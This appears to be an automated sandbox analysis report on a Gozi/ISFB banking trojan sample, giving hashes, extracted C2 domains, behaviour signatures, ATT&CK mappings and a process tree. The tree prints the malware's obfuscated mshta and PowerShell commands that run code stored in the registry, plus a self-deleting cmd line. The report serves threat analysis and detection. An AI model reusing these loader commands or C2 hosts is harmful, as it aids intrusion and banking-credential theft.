Overview

overview

10

Static

static

3

NEAS.Secur...JC.exe

windows7-x64

10

NEAS.Secur...JC.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    151s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-10-2023 15:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    NEAS.SecuriteInfocomWin32TrojanXgen2512321919_JC.exe

  • Size

    293KB

  • MD5

    f4596eec21608b69a6410f3c1163f290

  • SHA1

    db1d45bdd0409d95f6d3b6084cad4e6fe90a3436

  • SHA256

    988ac9d35c37f6e957a5f292b871325fece89e106d4ac91d61d7ef5cd657ad8a

  • SHA512

    c8d70e20cb3db7f050a0cb75d9f4ae3099760507eb707951c602f2d2de6adb564f87425153c77cae5b465c5efa7f5b4b13be642f8c95c9e14ed2d007e29e8dce

  • SSDEEP

    3072:IvjRMbYbmYQDtBRd7QuszTc3iHjL1473r49ot:eWYaYQzRhSOuL1ik9o

Score
10/10
gozi5050bankerisfbtrojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

http://igrovdow.com

Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3720
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:4860
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:3960
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of UnmapMainImage
        • Suspicious use of WriteProcessMemory
        PID:3176
        • C:\Users\Admin\AppData\Local\Temp\NEAS.SecuriteInfocomWin32TrojanXgen2512321919_JC.exe
          "C:\Users\Admin\AppData\Local\Temp\NEAS.SecuriteInfocomWin32TrojanXgen2512321919_JC.exe"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4284
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 484
            3⤵
            • Program crash
            PID:2764
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Q3xn='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Q3xn).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\5C68964F-0BE8-EE1D-7550-6F0279841356\\\MaskControl'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:964
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name yebcva -value gp; new-alias -name omtuwqn -value iex; omtuwqn ([System.Text.Encoding]::ASCII.GetString((yebcva "HKCU:Software\AppDataLow\Software\Microsoft\5C68964F-0BE8-EE1D-7550-6F0279841356").PlaySystem))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2580
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kgenm40z\kgenm40z.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1876
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCD91.tmp" "c:\Users\Admin\AppData\Local\Temp\kgenm40z\CSC968E4006BE2249AC90807B56DCF43ED5.TMP"
                5⤵
                  PID:4620
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g1ac2oty\g1ac2oty.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2248
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCE9A.tmp" "c:\Users\Admin\AppData\Local\Temp\g1ac2oty\CSC3DFAEB6D43F43118B6BA3C736A224E.TMP"
                  5⤵
                    PID:3592
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\NEAS.SecuriteInfocomWin32TrojanXgen2512321919_JC.exe"
              2⤵
                PID:4312
                • C:\Windows\system32\PING.EXE
                  ping localhost -n 5
                  3⤵
                  • Runs ping.exe
                  PID:2408
              • C:\Windows\syswow64\cmd.exe
                "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
                2⤵
                  PID:1968
              • C:\Windows\System32\RuntimeBroker.exe
                C:\Windows\System32\RuntimeBroker.exe -Embedding
                1⤵
                • Modifies registry class
                PID:4172
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4284 -ip 4284
                1⤵
                  PID:2352

                Network

                MITRE ATT&CK Matrix ATT&CK v13

                Initial Access

                Execution

                Persistence

                Privilege Escalation

                Defense Evasion

                Credential Access

                Discovery

                Query Registry

                1
                T1012

                System Information Discovery

                2
                T1082

                Remote System Discovery

                1
                T1018

                Lateral Movement

                Collection

                Exfiltration

                Command and Control

                Impact

                Resource Development

                Reconnaissance

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Temp\RESCD91.tmp
                  Filesize

                  1KB

                  MD5

                  20393eb81b3c2f876e40f43016bae190

                  SHA1

                  b99c7b47c5d98570bcbf17de2f5b467897a0194b

                  SHA256

                  e7b71c8d011f0f097acdeb4d12f6ad11e678013cf0b6a5584d42ac96fae4a4fd

                  SHA512

                  e02464ffc851141ec3779d55b0d739ba74cde4b5aafc0754de4f222f21c824f2b32e83ba48649e343d7bad93acbbd38f888680fb906ed9e20a146692e535f391

                  Download Submit
                • C:\Users\Admin\AppData\Local\Temp\RESCE9A.tmp
                  Filesize

                  1KB

                  MD5

                  33671fd20da231a612ed34a8c12f765f

                  SHA1

                  a92d58289192abc22a88eb23cd58688903feb4cd

                  SHA256

                  663914ec8533b8663488629808064148c77e5b54b50abfe1409ffeb2566bdda1

                  SHA512

                  64d50964f6e243c4e6a774b6289637b6ee61c87b44322a45ab3fe0d5c0d5c16151102364c21c39fd15a0a0769a156623f613c79e5be5b84cf0b50048f986fecb

                  Download Submit
                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1reos1kp.xxw.ps1
                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  Download Submit
                • C:\Users\Admin\AppData\Local\Temp\g1ac2oty\g1ac2oty.dll
                  Filesize

                  3KB

                  MD5

                  dd415fcccf08307f077a4a0106f89d0b

                  SHA1

                  d0df7ade20eff6a271b1aaf9173c8701734c86dc

                  SHA256

                  46fcaa8ea1c505ee853065479662a136e7ed033245c2ce51620a38f1526ccc0a

                  SHA512

                  e5cb9ce0141c7fa3edd0b4202dfb6bce064e241aa2585ad5a6c16bc175f1eccfe7ac29451633603db14f73c697344ea83a6d826c4c7370faf8850097daa67437

                  Download Submit
                • C:\Users\Admin\AppData\Local\Temp\kgenm40z\kgenm40z.dll
                  Filesize

                  3KB

                  MD5

                  a8da78a4566124af7f3702759f4bfab2

                  SHA1

                  7172b3a52e0d6133c9916330a654021428fb9ea1

                  SHA256

                  2f2c765865a65f8d76d1f2c0555a122bddfc7f496d40785209f2b21739e5bf2a

                  SHA512

                  b1f5a43b179db98ec882c3ffe10cfeac475e35bbe094366a54985d2ad0679e56494fa76fc47b8d2f999ea795f76ef1610b1d262ff14121094969578a05a927b8

                  Download Submit
                • \??\c:\Users\Admin\AppData\Local\Temp\g1ac2oty\CSC3DFAEB6D43F43118B6BA3C736A224E.TMP
                  Filesize

                  652B

                  MD5

                  feda9cb5de6c886d9aeb1a9d47a2b5de

                  SHA1

                  6c66a6776869d0a361c6afecdee673d1815236ea

                  SHA256

                  477491ff09139b200f8e0f20737390768c61fe5dce976ef0abb23785980b59dd

                  SHA512

                  6eff35623c6572bc44e00bf4baff2431865c3fe2c3603e9575209accd85f1576800adde382917dab43fb69e196a96060bfd09824faa443e4f8a987b84535791d

                  Download Submit
                • \??\c:\Users\Admin\AppData\Local\Temp\g1ac2oty\g1ac2oty.0.cs
                  Filesize

                  406B

                  MD5

                  ca8887eacd573690830f71efaf282712

                  SHA1

                  0acd4f49fc8cf6372950792402ec3aeb68569ef8

                  SHA256

                  568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                  SHA512

                  2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

                  Download Submit
                • \??\c:\Users\Admin\AppData\Local\Temp\g1ac2oty\g1ac2oty.cmdline
                  Filesize

                  369B

                  MD5

                  85def57664eff06434c102802171ed7c

                  SHA1

                  a6adb0e75342e715eb36aa54c1db64ceb2ad7fc6

                  SHA256

                  10c4389380a9a29c01c5a6bd56c3406109dc842f6fb3ef45be0b4319802b0a93

                  SHA512

                  0b96193b608283afaf32c750aeecb21e7ae7d52f8b74e36a1bc57af5cfc540f22d6f0135cf96b981efdae70212b593381bcbf30b9241201b3f1ad9f8e2566a30

                  Download Submit
                • \??\c:\Users\Admin\AppData\Local\Temp\kgenm40z\CSC968E4006BE2249AC90807B56DCF43ED5.TMP
                  Filesize

                  652B

                  MD5

                  d8d6bdd2e0da82674e3fb4b48c3e5c04

                  SHA1

                  51104d78ab6540a429b69cfa8c256c41b51105b3

                  SHA256

                  b913e97a39e8a55752ba620ea386a01a4efbd3ff18de61661dd4a045a6009b77

                  SHA512

                  ad71e10c1ce2278e4a39ed00fa59d8f7ac562f43d18707c69aaf19a0e616c18d177fa4c75bb5d32ac8540155561237b70d7c54f772634d1a9aacdd5bbb91c8b9

                  Download Submit
                • \??\c:\Users\Admin\AppData\Local\Temp\kgenm40z\kgenm40z.0.cs
                  Filesize

                  405B

                  MD5

                  caed0b2e2cebaecd1db50994e0c15272

                  SHA1

                  5dfac9382598e0ad2e700de4f833de155c9c65fa

                  SHA256

                  21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                  SHA512

                  86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

                  Download Submit
                • \??\c:\Users\Admin\AppData\Local\Temp\kgenm40z\kgenm40z.cmdline
                  Filesize

                  369B

                  MD5

                  ca970761e0b71651622a029b5360df5f

                  SHA1

                  9342f430657044d17f29478234cfe0e109b56842

                  SHA256

                  876d3d4826e2bd7643c7fd0d683a5b39893f1bbb5617fe1d2d4905eae65d2c4b

                  SHA512

                  e799d28b7efd7e50008bb77f3a6190af4cae8a2d48dc7ef425d552ed9c2e3002f681cf1f7b1cf86aba4a29572db72ebf81536b7694262853a1760303d410e07d

                  Download Submit
                • memory/1968-102-0x0000000001460000-0x00000000014F8000-memory.dmp
                  Filesize

                  608KB

                  Download
                • memory/1968-105-0x0000000000DE0000-0x0000000000DE1000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/1968-107-0x0000000001460000-0x00000000014F8000-memory.dmp
                  Filesize

                  608KB

                  Download
                • memory/2408-98-0x0000026946B10000-0x0000026946BB4000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/2580-52-0x00000148D5E00000-0x00000148D5E08000-memory.dmp
                  Filesize

                  32KB

                  Download
                • memory/2580-54-0x00000148EE3B0000-0x00000148EE3ED000-memory.dmp
                  Filesize

                  244KB

                  Download
                • memory/2580-22-0x00000148D5C40000-0x00000148D5C50000-memory.dmp
                  Filesize

                  64KB

                  Download
                • memory/2580-38-0x00000148D5DB0000-0x00000148D5DB8000-memory.dmp
                  Filesize

                  32KB

                  Download
                • memory/2580-23-0x00000148D5C40000-0x00000148D5C50000-memory.dmp
                  Filesize

                  64KB

                  Download
                • memory/2580-21-0x00007FFF70F20000-0x00007FFF719E1000-memory.dmp
                  Filesize

                  10.8MB

                  Download
                • memory/2580-16-0x00000148D5DC0000-0x00000148D5DE2000-memory.dmp
                  Filesize

                  136KB

                  Download
                • memory/2580-68-0x00000148EE3B0000-0x00000148EE3ED000-memory.dmp
                  Filesize

                  244KB

                  Download
                • memory/2580-67-0x00007FFF70F20000-0x00007FFF719E1000-memory.dmp
                  Filesize

                  10.8MB

                  Download
                • memory/2580-24-0x00000148D5C40000-0x00000148D5C50000-memory.dmp
                  Filesize

                  64KB

                  Download
                • memory/3176-57-0x0000000007260000-0x0000000007261000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/3176-56-0x0000000008AF0000-0x0000000008B94000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/3176-94-0x0000000008AF0000-0x0000000008B94000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/3720-70-0x0000012BBC160000-0x0000012BBC204000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/3720-71-0x0000012BBC210000-0x0000012BBC211000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/3720-103-0x0000012BBC160000-0x0000012BBC204000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/3960-108-0x0000025AD7E20000-0x0000025AD7EC4000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/3960-77-0x0000025AD7DE0000-0x0000025AD7DE1000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/3960-76-0x0000025AD7E20000-0x0000025AD7EC4000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/4172-89-0x000001F1AA6B0000-0x000001F1AA6B1000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/4172-112-0x000001F1AAD40000-0x000001F1AADE4000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/4172-88-0x000001F1AAD40000-0x000001F1AADE4000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/4284-8-0x0000000000400000-0x000000000228F000-memory.dmp
                  Filesize

                  30.6MB

                  Download
                • memory/4284-3-0x0000000000400000-0x000000000228F000-memory.dmp
                  Filesize

                  30.6MB

                  Download
                • memory/4284-9-0x0000000003E90000-0x0000000003E9B000-memory.dmp
                  Filesize

                  44KB

                  Download
                • memory/4284-111-0x0000000000400000-0x000000000228F000-memory.dmp
                  Filesize

                  30.6MB

                  Download
                • memory/4284-7-0x00000000024E0000-0x00000000025E0000-memory.dmp
                  Filesize

                  1024KB

                  Download
                • memory/4284-2-0x0000000003E90000-0x0000000003E9B000-memory.dmp
                  Filesize

                  44KB

                  Download
                • memory/4284-4-0x0000000003EF0000-0x0000000003EFD000-memory.dmp
                  Filesize

                  52KB

                  Download
                • memory/4284-1-0x00000000024E0000-0x00000000025E0000-memory.dmp
                  Filesize

                  1024KB

                  Download
                • memory/4312-110-0x000002043CA20000-0x000002043CAC4000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/4312-96-0x000002043CA20000-0x000002043CAC4000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/4312-95-0x000002043CAD0000-0x000002043CAD1000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/4860-83-0x0000023110590000-0x0000023110591000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/4860-82-0x0000023110CF0000-0x0000023110D94000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/4860-109-0x0000023110CF0000-0x0000023110D94000-memory.dmp
                  Filesize

                  656KB

                  Download